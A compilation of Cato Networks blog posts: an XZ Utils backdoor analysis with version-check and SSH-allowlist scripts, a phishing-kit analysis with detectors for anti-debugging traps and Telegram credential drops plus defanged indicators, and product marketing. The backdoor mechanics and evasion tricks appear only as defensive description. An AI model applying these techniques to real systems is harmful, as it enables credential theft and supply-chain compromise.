Extracting and decrypting a payload file (good-large_compressed.lzma) using a decryption algorithm.

Saving the decrypted payload as liblzma_la-crc64-fast.o.

Replacing the original CRC code with the modified version, including the decrypted payload.

The script compiles the modified CRC code using the GCC compiler with specific flags and options.

If the compilation is successful, the script replaces the original CRC object files (.libs/liblzma_la-crc64_fast.o and .libs/liblzma_la-crc32_fast.o) with the modified versions.

The script links the modified object files into the XZ library (liblzma.so).

After a successful build and installation, the backdoor intercepts execution by substituting the ifunc resolvers for crc32_resolve() and crc64_resolve(), changing the code to call _get_cpuid().

“ifunc” is a glibc mechanism that allows you to implement a function in different ways and choose between the implementations at runtime. The choice is made by a resolver function, typically when the program is loaded.
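ifunc is a C and dynamic-linker feature, so it cannot be shown directly in Python. As a loose analogy only, the sketch below mimics the idea: a resolver runs once and decides which implementation a name is bound to. All function names are hypothetical, and the "fast" variant simply defers to zlib as a stand-in for a CPU-optimized routine.

```python
import zlib


def crc_generic(data: bytes) -> int:
    """Portable fallback: bitwise CRC-32 (reflected polynomial 0xEDB88320)."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ (0xEDB88320 if crc & 1 else 0)
    return crc ^ 0xFFFFFFFF


def crc_fast(data: bytes) -> int:
    """Stand-in for an optimized variant; defers to zlib's C implementation."""
    return zlib.crc32(data)


def resolve_crc(cpu_has_fast_path: bool):
    """Resolver: runs once and returns the implementation to bind."""
    return crc_fast if cpu_has_fast_path else crc_generic


# Callers use the name crc32 and never see which variant was chosen.
crc32 = resolve_crc(cpu_has_fast_path=True)
print(hex(crc32(b"123456789")))
```

Because callers only ever see the bound name, whoever controls the resolver controls which code runs. That is why replacing the resolvers gave the backdoor an early and inconspicuous foothold.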

Afterwards, the backdoor uses an audit hook, installed immediately, to monitor the dynamic linking of libraries into the process, waiting for the RSA_public_decrypt@got.plt symbol to be resolved.

Once it sees RSA_public_decrypt@got.plt being resolved, the backdoor replaces the symbol's address with the address of attacker-controlled code.

Now, when a client connects via SSH, the process executes attacker-controlled code in the context before key authentication.

As you can see, it’s a sophisticated and stealthy attack, of the kind usually associated with a nation-state-sponsored adversary.

The “xz” GitHub repository and the official site were taken down.

Who is Behind the XZ Backdoor?

The backdoor commit was made by an individual using the name "Jia Tan" and the username "JiaT75". This GitHub account was created in 2021 and has been active since then. They “contributed” to a few projects, including “OSS-Fuzz” by Google. But they were mainly active in the “xz” project.

How was “JiaT75”’s commit to “xz” approved? You can read the full chain of events on Evan Boehs’s blog. In short, the path to implementing the backdoor began approximately two years ago. The project’s main developer, Lasse Collin, was accused of slow progress. User Jigar Kumar insisted that xz needed a new maintainer for development and demanded that patches be merged by Jia Tan, who contributed to the project voluntarily.

In 2022, Lasse Collin admitted to a stranger that he was in a difficult position: mental health issues, lack of resources and physical limitations were hindering his progress and the project's pace. However, with Jia Tan's contributions, he said he might be able to take on a more significant role in the project.

In 2023, Jia Tan replaced Lasse Collin as the main contact for oss-fuzz, a fuzzer for open-source projects from Google. That same year, he committed the infrastructure that would be used in the exploit. The commit is attributed to Hans Jansen, a user who seems to have been created solely for this purpose. Jia Tan then submitted a pull request to oss-fuzz urging the disabling of some checks, citing the need for ifunc support in xz.

In 2024, Jia Tan changed the project link in oss-fuzz from tukaani.org/xz to xz.tukaani.org/xz-utils and completed the backdoor's finishing touches.

Jia Tan, whoever he may be, started building this attack in 2021, gaining the trust of the primary maintainer of the XZ project. The amount of time and dedication from Jia Tan can only be attributed to a persistent adversary.

What Does This Mean for Other Open-source Projects?

Creating a validation process for entities that commit the code is important, especially for repositories that can affect other software.

As demonstrated by @hasherezade, it is very easy to spoof the account that commits to GitHub.

Conduct a proper code review until you understand what is being committed.

In the “XZ” backdoor commit, the backdoor was hidden inside an XZ-compressed test file. You could spot the malicious code only by running and analyzing it.

Maintaining open-source projects requires a lot of time and dedication. You need to vet the person you want to hand the project over to.

What Can Cato’s Customers Do?

Check Which Version of “XZ” is Installed On Your Systems

Check the version of “XZ” on your system. Versions 5.6.0 or 5.6.1 are affected.

Run the following commands in your terminal:

xz --version

apt info xz-utils

You can also check https://repology.org/project/xz/versions for affected systems.

Downgrade to an older version if possible.
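For checking many hosts, the version test can be scripted. The sketch below is a minimal example that assumes `xz --version` prints a first line of the form `xz (XZ Utils) 5.6.1`; the function names are hypothetical, and a match should be treated as a prompt to consult your distribution's advisory rather than as a final verdict.

```python
import re
import subprocess

# The two releases named in this post as containing the backdoor.
AFFECTED_VERSIONS = {"5.6.0", "5.6.1"}


def parse_xz_version(version_output):
    """Extract the XZ Utils version from `xz --version` output, or None."""
    match = re.search(r"xz \(XZ Utils\) (\d+\.\d+\.\d+)", version_output)
    return match.group(1) if match else None


def is_affected(version_output):
    """True when the reported version is one of the affected releases."""
    return parse_xz_version(version_output) in AFFECTED_VERSIONS


if __name__ == "__main__":
    try:
        result = subprocess.run(
            ["xz", "--version"], capture_output=True, text=True, check=True
        )
    except (FileNotFoundError, subprocess.CalledProcessError):
        print("xz not found or failed to run")
    else:
        version = parse_xz_version(result.stdout)
        status = "AFFECTED" if version in AFFECTED_VERSIONS else "not in the affected list"
        print(f"xz {version}: {status}")
```

Keeping the parsing separate from the subprocess call makes it easy to feed in output collected from remote machines.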

XZ malicious package detection

We've verified that there have been no indications of downloads of the known malicious files, based on hashes or file names, over the past six weeks, at least for customers who have TLSi enabled. (Note, however, that malicious files could still reach users through other forms of distribution, for example as part of a package.)

The BitDefender Anti-Malware engine classifies the XZ package files as malicious files and blocks them if Anti-Malware is enabled.

SSH Traffic

Until the verification and downgrade process is completed, apply strict access policies on inbound SSH traffic, limiting access to trusted sources and only when actually necessary.


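The "trusted sources only" policy amounts to an allowlist check on the source address. The sketch below illustrates that decision in Python. It is not how a Cato firewall rule is configured, and the networks listed are placeholder ranges chosen for the example.

```python
import ipaddress

# Placeholder ranges: an internal network and a documentation-only public range.
TRUSTED_SSH_SOURCES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("203.0.113.0/24"),
]


def allow_inbound_ssh(source_ip):
    """Allow the connection only when the source falls inside a trusted network."""
    address = ipaddress.ip_address(source_ip)
    return any(address in network for network in TRUSTED_SSH_SOURCES)


print(allow_inbound_ssh("203.0.113.7"))   # inside a trusted range
print(allow_inbound_ssh("198.51.100.9"))  # outside every trusted range
```

The default here is deny: an address that matches no listed network is rejected, which is the safer posture while systems are still being verified.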

Cato’s Multi-layer Detection and Mitigation Approach

Cyber-attacks are usually not an isolated event. They have multiple steps. Cato has multiple detections and mitigations across the entire kill chain, including initial access, lateral movement, data exfiltration, and more.

Cato’s Infrastructure

After checking Cato’s infrastructure, we can confirm that Cato is not using the vulnerable version of XZ / liblzma.

Final Thoughts

We still do not know the full extent of this backdoor's impact. There is always fallout in such cases as the security community delves deep and uncovers more information about possible attacks.

The initial commit was on February 23, 2024 and it was discovered on March 29, 2024. This is a significant window for malicious activity to occur.

In security incidents, multiple layers of detection and mitigation capabilities are crucial to halt the attack through various means.

We are continuing to research and monitor for further developments.

Outsmarting Cyber Threats: Etay Maor Unveils the Hacker’s Playbook in the Cloud Era

This blog post is based on research by Avishay Zawoznik, Security Research Manager at Cato Networks.

The Cloud Conundrum: Navigating New Cyber Threats in a Digital World

In an era where cyber threats evolve as rapidly as the technology they target, understanding the mindset of those behind the attacks is crucial. This was the central theme of a speech given by Etay Maor, Senior Director of Security Strategy at Cato Networks, at the MSP EXPO 2024 Conference & Exposition in Fort Lauderdale, Florida. Titled “SASE vs. On-Prem A Hacker’s Perspective,” Maor’s session provided invaluable insights into the sophisticated tactics of modern cybercriminals.

Maor’s presentation painted a vivid picture of the ongoing battle in the cyber world. He emphasized that as businesses transition to cloud-based solutions, hackers are not far behind, exploiting these very platforms to orchestrate their malicious activities. Trusted cloud services and applications, once seen as safe havens, are now being used to extract sensitive data, distribute malware, and launch phishing campaigns.

The session highlighted a concerning trend: many organizations are still anchored in an on-premises mindset. This approach, unfortunately, is increasingly inadequate in countering modern cyber threats. Maor’s argument was supported by a series of case studies detailing real-life attacks, showcasing how these threats are not just theoretical but present and active dangers.

[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/"] Discover the Cybersecurity Master Class[/boxlink]

Embracing SASE: A New Frontier in Cybersecurity

One of the most interesting parts of the session was the live demonstrations. These demonstrations brought to light the ease with which hackers can penetrate systems that rely on outdated security models. Maor also shared insights from underground forums, offering a rare glimpse into the ways hackers plan and execute their attacks. This peek into the hacker’s world underscored the need for a more dynamic and forward-thinking approach to cybersecurity.





In contrast to the traditional on-premises solutions, Maor extolled the virtues of SASE architecture. He delineated how SASE’s convergence of network and security services into a single, cloud-native solution offers a more robust defense against the complexities of today’s cyber landscape. SASE’s adaptability, scalability, and integrated security posture make it a formidable opponent against the tactics employed by modern hackers.

The key takeaway from Maor’s speech was clear: the transition to cloud-based infrastructures demands a paradigm shift in our approach to cybersecurity. Traditional methods are no longer sufficient in this new digital battlefield. Businesses must embrace innovative solutions like SASE to stay ahead of cybercriminals.

As we navigate this complex cybersecurity landscape, Maor’s insights are not just thought-provoking but essential. To delve deeper into these concepts and fortify your organization’s cybersecurity posture, don’t miss Cato Networks’ Cybersecurity Master Class. This comprehensive resource offers a wealth of knowledge and strategies to combat the ever-evolving threat landscape.

Visit the Cybersecurity Master Class webpage today and take the first step towards a more secure digital future.



Winning the 10G Race with Cato

The Need for Speed

The rapidly evolving technology and digital transformation landscape has ushered in increased requirements for high-speed connectivity to accommodate high-bandwidth application and service demands. Numerous use cases, such as streaming media, internet gaming, complex data analytics, and real-time collaboration, require we go beyond today’s connectivity trends to define new ones. Our ever-changing business landscape dictates that every transaction, every bit, and every byte will matter more tomorrow than it does today, so these use cases require a flexible and scalable network infrastructure to keep pace with innovation.

10G Enabling Industries

Bandwidth-hungry use cases continue to evolve, and the demand to accommodate them will continue to grow. To accommodate these use cases, today’s organizations must aggregate multiple 1G links, which introduces its own set of issues, including configuration, reliability, scalability, and maintenance. However, achieving these high-performance business requirements is now possible with 10 gigabits per second (10G) bandwidth, which is poised to become a key enabler of digital business. 10G has rapidly evolved into a necessity for modern digital companies, institutions, and governments, and all stand to benefit from this increased capacity. So, whether it is telemedicine, enterprise networking, or cloud computing, the requirement for 10G bandwidth will be driven by the requirement for predictable and reliable user experiences. This will revolutionize modern-day use cases across numerous industries and bring about new business opportunities for customers and service providers alike.

Another motivator for the move to 10G is the insatiable demand for scalable global connectivity. This demand dictates optimized networking and capacity that scales with the business as non-negotiable requirements for the future of digital business. 10G can deliver on these demands to accelerate networking capabilities, allowing it to exceed previous constraints to improve performance. However, despite the numerous enhancements 10G brings to modern bandwidth-hungry industries, an innovative platform that scales performance and ensures reliability is required to realize its full potential.



Achieving these benefits requires a unique architectural approach to scaling network capabilities while securely accelerating business innovation. This approach extracts core networking and security functions from the on-prem hardware edge. It then converges them into a single software stack on a global cloud-native service, making it easier to expand existing capacity to 10G without expensive hardware upgrades. This requires a SASE service that delivers the enhanced performance needed for digital industries and achieves maximum efficiency and effectiveness. This is only possible with a powerful platform like Cato.

More Efficient 10G with Cato SASE Cloud Platform

The Cato SASE Cloud platform is a global service built on top of a private cloud network of interconnected Points of Presence (PoPs) running the identical software stack. This is significant because the single-pass cloud engine (SPACE) powers the platform. Cato SPACE is a converged cloud-native engine that enables simultaneous network and security inspection of all traffic flows. It applies consistent global policies to these flows at speeds up to 10G per tunnel from a single site without expensive hardware upgrades. This is only possible because of the power of Cato SPACE and improvements made to our core to enable faster performance at the cloud edge.

Cato provides customers and partners with multi-layered resiliency built into an SLA-backed backbone that drives improved 10G performance, security, and reliability without compromise. Industries like manufacturing, media, healthcare, and performance sports present unique opportunities for predictable, reliable, high-performance experiences that only a robust platform can deliver. The Cato SASE Cloud and 10G dramatically alter the performance conversation for transformational industries and bring a new digital platform approach to modernizing their networks.

Cato SASE Cloud Platform and the TAG Heuer Porsche Formula E Team

Cato has introduced 10G at the 2024 Tokyo E-Prix, the perfect venue to highlight Cato's breakthrough performance. In the fast-paced world of Formula E, every second counts. The sport is intensively data-driven, where teams rely on their IT networks to analyze data and make critical, split-second strategy decisions to achieve a winning edge. Multiple computers in the car produce 100 to 500 billion data points per event, with more than 400 gigabytes of data generated and sent back to the cloud for analysis.

With 16 E-Prix this season, many in regions lacking Tokyo's developed infrastructure, the ABB FIA Formula E World Championship presents an incredible networking and security stress test. Cato SASE Cloud provides fast, secure, and reliable access to the TAG Heuer Porsche Formula E Team, regardless of location.

To learn more about Cato SASE Cloud, visit us at https://www.catonetworks.com/platform/

To learn more about Cato's partnership with the TAG Heuer Porsche Formula E Team, visit us at https://www.catonetworks.com/porsche-formula-e-team/.

When SASE-based XDR Expands into Network Operations: Revolutionizing Network Monitoring

Cato XDR breaks the mold: Now, one platform tackles both security threats and network issues for true SASE convergence.















SASE, or Secure Access Service Edge, represents the core evolution of today’s enterprise networks, converging network and security functions into a single, unified, cloud-native architecture. Today's global work-from-anywhere model amplifies the need for IT to have centralized management of both network connectivity and comprehensive security. Simple as that sounds, comprehensive security entails the complexity of combining many different security tools. Complementing the SASE revolution is XDR (Extended Detection and Response), a powerful tool that analyzes data from various security solutions to provide a unified view of potential threats across the enterprise. SASE and XDR are powerful tools on their own, but even greater security benefits can be achieved by enabling them to work together more seamlessly. How do we make this happen?

Unlocking Security Potential: SASE + XDR

Tighter alignment between SASE and XDR unlocks the full potential of both, for a more robust security posture. While XDR tools excel in analyzing data from various security solutions, they could do much more with higher-quality data. This is where Cato's recently announced SASE-based XDR comes in, with the industry’s broadest range of native security sensors. Traditionally, an XDR tool needs to “normalize” the diverse security data it ingests before that data can be analyzed and threat levels established. This “normalization” dilutes the quality of the data and adds a layer of complexity. When data is diluted or of low quality, it becomes more challenging to distinguish legitimate threats from false positives. By eliminating the need to normalize data from disparate security solutions, and instead using a broad range of pure, native data to determine threat levels, Cato’s XDR delivers a higher level of security with faster response times, all within the single management application of the Cato SASE Cloud Platform.

What SASE Needs From XDR

Cato XDR represents a significant advancement in security incident detection and response, emphasizing quality and efficiency. However, SASE is a combination of network and security. The intent of SASE is to bring network and security together so that enterprises can truly move at the speed of business. This means that a logical expectation for the XDR capabilities of a SASE platform is to also help IT detect issues on the network unrelated to security. Integrating robust network health monitoring capabilities into the central SASE architecture is vital. And guess what? This is precisely the direction we're headed!

Cato XDR: Security Stories Plus Network Stories

Introducing Network Stories for XDR, by Cato Networks. Network Stories for XDR focuses on detection and remediation of connectivity and performance issues. It uses the exact same XDR practices previously developed to detect cyber threats and attacks. Together, security stories and network stories offer a singular SASE-based XDR solution for SOC and NOC teams to collaborate on.



With Cato XDR, network stories and security stories seamlessly integrate within the same overarching SASE platform. For IT teams, this consolidation means managing the entire network and security infrastructure from a single, unified platform. From configuration and policy management to ongoing monitoring, and now to detection and remediation, network and security teams can collaborate efficiently using a single pane of glass. This unified, converged approach helps resolve both security and network issues faster, more cohesively, and more efficiently than ever before. In keeping with the agility of a true platform architecture, Cato XDR is delivered with the flick of a switch, not by buying, deploying, and integrating an entirely new product that adds complexity to the network and security stack.

Cato XDR unlocks the power of true SASE convergence, enabling security and network teams to collaborate seamlessly on a single platform.

The Role of AI in Network Stories for XDR

Cato XDR takes network incident detection to the next level with AI-powered Network Stories. These AI algorithms, in true SASE fashion, go beyond security, collecting network signals to pinpoint the root causes of issues like blackouts, brownouts, BGP session disconnects, LAN hosts going down, and general HA (high-availability) impacts. Similar to security stories, AI/ML is utilized for incident prioritization based on calculated criticality, empowering IT teams to focus on incidents that have the biggest impact on business performance. This technology is truly battle-tested and has proven effective in servicing Cato’s own NOC. Remediation time is further reduced with playbooks that contain guided steps for fast resolution.

Pushing SASE Limits for NOC/SOC Convergence

Cato provides the world’s leading single-vendor SASE platform as a secure foundation specifically built for the digital business. The Cato SASE Cloud Platform converges networking with a wide range of security capabilities into a global cloud-native service with a future-proof platform that is self-maintaining, self-evolving and self-healing.

Cato XDR takes SASE convergence a step further with Network Stories. It leverages Cato's proven AI and machine learning expertise, traditionally used for security analysis, and applies it to network health. Network Stories for XDR identify and remediate network issues such as blackouts and high-availability impacts, empowering IT teams to focus on incidents that most significantly impact business performance. This unified approach streamlines collaboration between security and network teams, enhancing efficiency and enabling faster resolution of issues. With Cato XDR, enterprises can realize the full potential of SASE convergence, achieving robust security and network performance on a single, future-proof platform.

Evasive Phishing Kits Exposed: Cato Networks’ In-Depth Analysis and Real-Time Defense

Phishing remains an ever-persistent and grave threat to organizations, serving as the primary conduit for infiltrating network infrastructures and pilfering valuable credentials. According to an FBI report, phishing is ranked number 1 in the top five Internet crime types.

Recently, the Cato Networks Threat Research team analyzed, and mitigated through our IPS engine, multiple advanced phishing kits, some of which include clever evasion techniques to avoid detection. In this analysis, the team exposes the tactics, techniques, and procedures (TTPs) of the latest phishing kits.



Here are four recent instances where Cato successfully thwarted phishing attempts in real-time:

Case 1: Mimicking Microsoft Support

When a potential victim clicks on an email link, they are led to a web page presenting an 'Error 403' message, accompanied by a link purportedly connecting them to Microsoft Support for issue resolution, as shown in Figure 2 below:

Figure 2 - Phishing Landing Page

Upon clicking "Microsoft Support," the victim is redirected to a deceptive page mirroring the Microsoft support center, seen in Figure 3 below:

Figure 3 – Fake Microsoft Support Center Website

Subsequently, when the victim selects the "Microsoft 365" icon or clicks the "Sign in" button, a pop-up page emerges, offering the victim a choice between "Home Support" and "Business Support", shown in Figure 4 below:

Figure 4 – Fake Support Links

Opting for "Business Support" redirects them to an exact replica of a classic O365 login page, which is malicious of course, illustrated in Figure 5 below:

Figure 5 – O365 Phishing Landing Page

Case 2: Rerouting and Anti-Debugging Measures

In this scenario, a victim clicks on an email link, only to find themselves directed to a FUD (fully undetectable) phishing landing page, as illustrated in Figure 6 below. Checking the domain on VirusTotal shows that none of the vendors have flagged it as phishing. The victim is seamlessly rerouted through a Cloudflare captcha, a strategic measure aimed at thwarting anti-phishing crawlers such as urlscan.io.

Figure 6 – FUD Phishing Landing Page

In this example we’ll dive into the anti-debugging capabilities of this phishing kit. Oftentimes, security researchers will use the browser’s built-in “Developer Tools” on suspicious websites, allowing them to dig into the source code and analyze it. The phishing kit has cleverly integrated a function featuring a 'debugger' statement, typically employed for debugging purposes. Whenever a JavaScript engine encounters this statement while a debugger such as Developer Tools is attached, it abruptly halts the execution of the code, establishing a breakpoint. Attempting to resume script execution triggers the invocation of another such function, aimed at thwarting the researcher's debugging efforts, as illustrated in Figure 7 below.

Figure 7 – Anti-Debugging Mechanism
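A defender can look for this pattern statically before opening a page in a browser. The sketch below is a rough heuristic, not Cato's detection logic. It treats timer calls as a supporting signal, on the assumption that the trap is re-armed with setInterval or setTimeout. The sample script is invented for illustration, and a plain text match will also hit the word inside strings or comments.

```python
import re

# The bare `debugger` keyword, which pauses execution when DevTools is open.
DEBUGGER_STATEMENT = re.compile(r"\bdebugger\b")
# Timers are a common way to re-arm the trap; treated as a supporting signal.
TIMER_CALL = re.compile(r"\bset(?:Interval|Timeout)\s*\(")


def anti_debugging_signals(js_source):
    """Count simple textual indicators of a debugger-based anti-analysis trap."""
    return {
        "debugger_statements": len(DEBUGGER_STATEMENT.findall(js_source)),
        "timer_calls": len(TIMER_CALL.findall(js_source)),
    }


def looks_like_debugger_trap(js_source):
    """Heuristic: a `debugger` statement combined with a timer that can re-fire it."""
    signals = anti_debugging_signals(js_source)
    return signals["debugger_statements"] > 0 and signals["timer_calls"] > 0


# Hypothetical sample resembling the mechanism described above.
sample = """
function trap() { debugger; }
setInterval(trap, 100);
"""
print(anti_debugging_signals(sample))
```

A hit is a reason to analyze the page in an instrumented or headless environment where breakpoints can be disabled, not proof of phishing on its own.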

Figure 8 – O365 Phishing Landing Page

Alternatively, phishing webpages employ yet another layer of anti-debugging mechanisms. Once debugging mode is detected, a pop-up promptly emerges within the browser. This pop-up redirects any potential security researcher to a trusted and legitimate domain, such as microsoft.com. This is yet another means to ensure that the researcher is unable to access the phishing domain, as illustrated below:

Case 3: Deceptive Chain of Redirection

In this intriguing scenario, the victim was sent a deceptive Baidu link that led them to a phishing webpage. However, the intricacies of this attack go deeper. Upon accessing the Baidu link, the victim is redirected to a third-party resource that is intended for anti-debugging purposes. Subsequently, the victim is redirected to the O365 phishing landing page.

This redirection chain serves a dual purpose. It tricks the victim into believing they are interacting with a legitimate domain, and it adds a layer of obfuscation to the malicious activity. To further complicate matters, the attackers employ a script that actively checks for signs of security researchers attempting to scrutinize the webpage and then redirects the victim to the phishing landing page on a different domain, as demonstrated in Figure 9 below from urlscan.io:

Figure 9 – Redirection Chain

The third-party domain plays a pivotal role in this scheme, housing JavaScript code that is obfuscated using Base64 encoding, as revealed in Figure 10:

Figure 10 – Obfuscated JavaScript

Upon decoding the Base64 script, its true intent becomes apparent. The script is designed to detect debugging mode and actively prevent any attempts to inspect the resource, as demonstrated in Figure 11 below:

Figure 11 – De-obfuscated Anti-Debugging Script
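The decoding step can be reproduced with the Python standard library. The sketch below assumes the kit passes a Base64 string literal to the browser's `atob()` function, which is a common pattern but is not confirmed here for this specific kit. The sample payload is a harmless stand-in.

```python
import base64
import binascii
import re

# Captures the string literal passed to atob("..."), the browser's Base64 decoder.
ATOB_CALL = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")


def decode_atob_payloads(js_source):
    """Return the decoded text of every Base64 literal passed to atob()."""
    decoded = []
    for encoded in ATOB_CALL.findall(js_source):
        try:
            raw = base64.b64decode(encoded, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid Base64; skip rather than guess
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


# Hypothetical sample: the payload is the Base64 form of a harmless script.
payload = base64.b64encode(b"console.log('inspect me');").decode("ascii")
sample = f'eval(atob("{payload}"));'
print(decode_atob_payloads(sample))
```

Decoding offline like this sidesteps the anti-debugging checks entirely, because the script is read as text and never executed.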

Case 4: Drop the Bot!

A key component of a classic Phishing attack is the drop URL. The attack's drop is used as a collection point for stolen information. The drop's purpose is to transfer the victim's compromised credentials into the attack's “Command and Control” (C2) panel once the user submits their personal details into the fake website's fields. In many cases, this is achieved by a server-side capability, primarily implemented using languages like PHP, ASP, etc., which serves as the backend component for the attack.

There are two common types of Phishing drops:

- A drop URL hosted on the relative path of the phishing attack's server.
- A remote drop URL hosted on a different site than the one hosting the attack itself.

One drop to rule them all: an attacker can leverage one external drop in multiple phishing attacks to consolidate all the phished credentials into one Phishing C2 server and make the adversary's life easier.

A recent trend involves using the Telegram Bot API URL as an external drop, where attackers create Telegram bots to facilitate the collection and storage of compromised credentials. In this way, the adversary can obtain the victim's credentials directly, even to their mobile device, anywhere and anytime, and can conduct the account takeover on the go. In addition to its effectiveness in aiding attackers, this method also facilitates evasion of Anti-Phishing solutions, as dismantling Telegram bots proves to be a challenging task.

Bot Creation Stage

Credentials Submission

Receiving the victim's credentials on a mobile device
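From a defender's point of view, a Telegram drop tends to leave a recognizable trace in the phishing page's source, because Bot API calls follow the form `https://api.telegram.org/bot<token>/<method>`. The Python sketch below scans page source for such URLs. The token pattern is a loose assumption, the function name `find_telegram_drops` is hypothetical, and the sample token is made up.

```python
import re

# Telegram Bot API calls look like https://api.telegram.org/bot<token>/<method>.
# The token shape used here (numeric bot id, colon, secret) is a loose assumption.
TELEGRAM_BOT_URL = re.compile(
    r"https?://api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)/(\w+)",
    re.IGNORECASE,
)


def find_telegram_drops(page_source: str) -> list[dict]:
    """Return the bot id and API method of each Bot API URL found in the source."""
    hits = []
    for match in TELEGRAM_BOT_URL.finditer(page_source):
        token, method = match.group(1), match.group(2)
        # Keep only the numeric bot id so the secret part is not copied around.
        hits.append({"bot_id": token.split(":", 1)[0], "method": method})
    return hits


# Hypothetical page snippet with a made-up token.
sample_source = (
    'fetch("https://api.telegram.org/bot123456789:AAExampleTokenOnly_notReal-000'
    '/sendMessage?chat_id=1&text=" + creds);'
)

print(find_telegram_drops(sample_source))
```

Attackers may build the URL at runtime or hide it behind encoding, so a miss from this static check does not prove that no Telegram drop is present.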

How Cato protects you against FUD (Fully Undetectable) Phishing

With Cato's FUD Phishing Mitigation, we offer organizations a dynamic and proactive defense against a wide spectrum of phishing threats, ensuring that even the most sophisticated attackers are thwarted at every turn.

Cato’s Security Research team uses advanced tools and strategies to detect, analyze, and build robust protection against the latest Phishing threats. Our protective measures leverage advanced heuristics, enabling us to discern legitimate webpage elements camouflaged in malicious sites. For instance, our system can detect anomalies like a genuine Office365 logo embedded in a site that is not affiliated with Microsoft, enhancing our ability to safeguard against such deceptive tactics. Furthermore, Cato employs a multi-faceted approach, integrating Threat Intelligence feeds and identification of newly registered domains to proactively block phishing domains. Additionally, our arsenal includes sophisticated machine learning (ML) models designed to identify potential phishing sites, including specialized models to detect Cybersquatting and domains created using Domain Generation Algorithms (DGA).
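As a rough illustration of the brand-mismatch idea only (this is not Cato's implementation), the Python sketch below flags a page that shows Microsoft or Office365 branding while being served from a host outside a small allowlist. The allowlist, the marker strings, and the function names are all assumptions chosen for the example.

```python
from urllib.parse import urlparse

# Hypothetical allowlist of domains assumed to legitimately serve Microsoft sign-in pages.
BRAND_DOMAINS = {"microsoft.com", "microsoftonline.com", "office.com", "live.com"}
# Hypothetical text markers that suggest the page presents itself as Office365.
BRAND_MARKERS = ("office365", "office 365", "microsoft")


def host_is_brand_owned(host: str) -> bool:
    """True if host equals, or is a subdomain of, an allowlisted domain."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)


def looks_like_brand_impersonation(url: str, page_text: str) -> bool:
    """Flag pages that show brand markers but are served from an unrelated host."""
    host = urlparse(url).hostname or ""
    text = page_text.lower()
    mentions_brand = any(marker in text for marker in BRAND_MARKERS)
    return mentions_brand and not host_is_brand_owned(host)


print(looks_like_brand_impersonation(
    "https://login.example-portal.test/o365", "<img alt='Office365 logo'>"))
print(looks_like_brand_impersonation(
    "https://login.microsoftonline.com/", "Microsoft sign in"))
```

Matching on the domain suffix rather than a substring matters here: a host such as `microsoft.com.evil.test` contains the brand name but is not a Microsoft subdomain, and the check treats it as unaffiliated.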

The example below, taken from Cato’s XDR, shows just one part of the arsenal of tools used by the Cato Research Team: auto-detection of a blocked Phishing attack by Cato’s Threat Prevention capabilities.

IOCs:

leadingsafecustomers[.]com

Reportsecuremessagemicrosharepoint[.]kirkco[.]us

baidu[.]com/link?url=UoOQDYLwlqkXmaXOTPH-yzlABydiidFYSYneujIBjalSn36BarPC6DuCgIN34REP

Dandejesus[.]com

bafkreigkxcsagdul5r7fdqwl4i4zg6wcdklfdrtu535rfzgubpvvn65znq[.]ipfs.dweb[.]link

4eac41fc-0f4f23a1[.]redwoodcu[.]live

Redwoodcu[.]redwoodcu[.]live
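The indicators above are defanged, with dots written as `[.]` so they cannot be clicked by accident. To load them into a blocklist or a search tool they usually need to be restored first. A minimal Python sketch, with hypothetical helper names `refang` and `ioc_host`:

```python
from urllib.parse import urlparse


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as example[.]com back into example.com."""
    return indicator.strip().replace("[.]", ".")


def ioc_host(indicator: str) -> str:
    """Return the lowercase hostname of a (possibly defanged) indicator."""
    cleaned = refang(indicator)
    if "://" not in cleaned:
        cleaned = "//" + cleaned  # lets urlparse treat the first part as the host
    return urlparse(cleaned).hostname or ""


for ioc in ["leadingsafecustomers[.]com", "Dandejesus[.]com", "baidu[.]com/link?url=abc"]:
    print(ioc_host(ioc))
```

Keep the indicators defanged in reports and tickets, and refang them only inside tooling.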






Lessons on Cybersecurity from Formula E

The ABB FIA Formula E World Championship is an exciting evolution of motorsports, having launched its first season of single-seater all-electric racing in 2014. The first-generation cars featured a humble 200kW of power but as technology has progressed, the current season Gen3 cars now have 350kW. Season 10 is currently in progress with 16 global races, many taking place on street circuits. Manufacturers such as Porsche, Jaguar, Maserati, Nissan, and McLaren participate, and their research and development for racing benefits design and production of consumer electric vehicles.

Racing electric cars adds complexity when compared to their internal combustion counterparts; success relies heavily on teamwork, strategy, and reliable data. Most notable is the simple fact that each car does not have enough total power capacity to complete a race. Teams must balance speed with regenerating power if they want to finish the race, using data to shape the strategy that will hopefully land their drivers on the podium.

Building an effective cybersecurity strategy has many parallels with the high-pressure world of Formula E racing. CISOs rely on accurate and timely data to manage their limited resources (time, people, and money) and stay ahead of bad actors and emerging threats. Technology investments designed to increase security posture could require too many resources, leaving organizations unable to fully execute their strategy.

Adding to the excitement and importance of strategy in Formula E racing is “Attack Mode.” Drivers can activate Attack Mode at a specific section of the track, delivering an additional 50kW of power twice per race for up to eight minutes total. Attack Mode rewards teams that can effectively use the real-time telemetry collected from the cars to plan the best overall strategy. Using Attack Mode too early or too late can significantly impact where the driver places at the race's end.


In a similar way, SASE is Attack Mode for enterprise cybersecurity and networking. Organizations that properly strategize and adopt cloud-native SASE solutions that fully converge networking and security gain powerful protection and visibility against threats, propelling their security postures forward in the never-ending race against bad actors. While the overall strategy is still critical to success, SASE not only provides superior data quality for investigation and remediation but also allows faster and more accurate decision making.

As mentioned above, cars like the TAG Heuer Porsche Formula E Team’s Porsche 99x Electric have increased significantly in power over time, and this should also be true of SASE platforms. At Cato Networks, we deliver more than 3,000 product enhancements every year, including completely new capabilities. The goal is not to have the most features, but, like the automotive manufacturers mentioned previously, to build the right capabilities in a usable way.

Cybersecurity requires balancing multiple factors to deliver the best outcomes and protections; as in Formula E, speed is important, but so are reliability and visibility. Consider that every SASE vendor is racing for your business, but not all of them can successfully deliver in all the areas that will make your strategy a success. Pay keen attention to traffic performance, intelligent visibility that helps you to identify and remediate threats, global presence, and the ability of the vendor to deliver meaningful new capabilities over time rather than buzzwords and grandiose claims. After all, in any race the outcomes are what matter, and we all want to be on the podium for making our organizations secure and productive.

